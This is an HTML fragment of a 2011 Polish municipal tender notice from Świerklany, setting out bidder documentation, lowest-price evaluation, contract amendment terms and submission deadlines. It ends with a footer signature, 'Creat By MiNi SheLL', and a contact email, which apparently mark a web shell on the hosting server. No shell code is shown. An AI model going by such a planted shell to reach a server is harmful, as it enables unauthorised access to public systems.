<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	formularz oferty zgodnie z treścią Załącznika nr 1;
2.	dowód wpłaty wadium;
3.	oryginał pełnomocnictwa lub poświadczona notarialnie kopia, udzielonego osobom podpisującym ofertę, o ile ich prawo do reprezentowania Wykonawcy nie wynika wprost z odpisu właściwego rejestru, ewidencji lub statutu (jeśli dotyczy);
4.	oryginał pełnomocnictwa lub poświadczona notarialnie kopia, do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenia zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo (jeśli dotyczy). Pełnomocnik może być umocowany do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy;
5.	umowa spółki cywilnej lub uchwała wspólników, z której wynikać będzie sposób reprezentacji spółki (jeśli dotyczy);
6.	aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, celem oceny ważności oferty, która odbywa się na podstawie odrębnych przepisów, w oparciu o art. 89 ust. 1 pkt. 8 ustawy Pzp (jeśli dotyczy).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Strony mogą zmienić postanowienia zawartej umowy w zakresie terminu wykonania, jeśli:
a)	dojdzie do zmiany terminu zakończenia robót inwestycyjnych. 
2.	Strony mogą zmienić postanowienia zawartej umowy w zakresie wartości umowy, jeśli:
a)	W przypadku zmiany przez władzę ustawodawczą określonej w par. 3 ust. 1 procentowej stawki VAT, kwota brutto wynagrodzenia zostanie aneksem do niniejszej umowy odpowiednio dostosowana.
3.	Strony mogą zmienić postanowienia zawartej umowy w zakresie osób pełniących nadzór inwestorski, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji i doświadczenia osób wymaganego postanowieniami Specyfikacji Istotnych Warunków Zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swierklany.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Świerklamy
ul. Świerklańska 54
44-264 Jankowice
Referat Inwestycji i Zamówień Publicznych, biuro nr 17, parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2011 godzina 10:00, miejsce: Urząd Gminy Świerklamy
ul. Świerklańska 54
44-264 Jankowice
Sekretariat, biuro nr 21, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com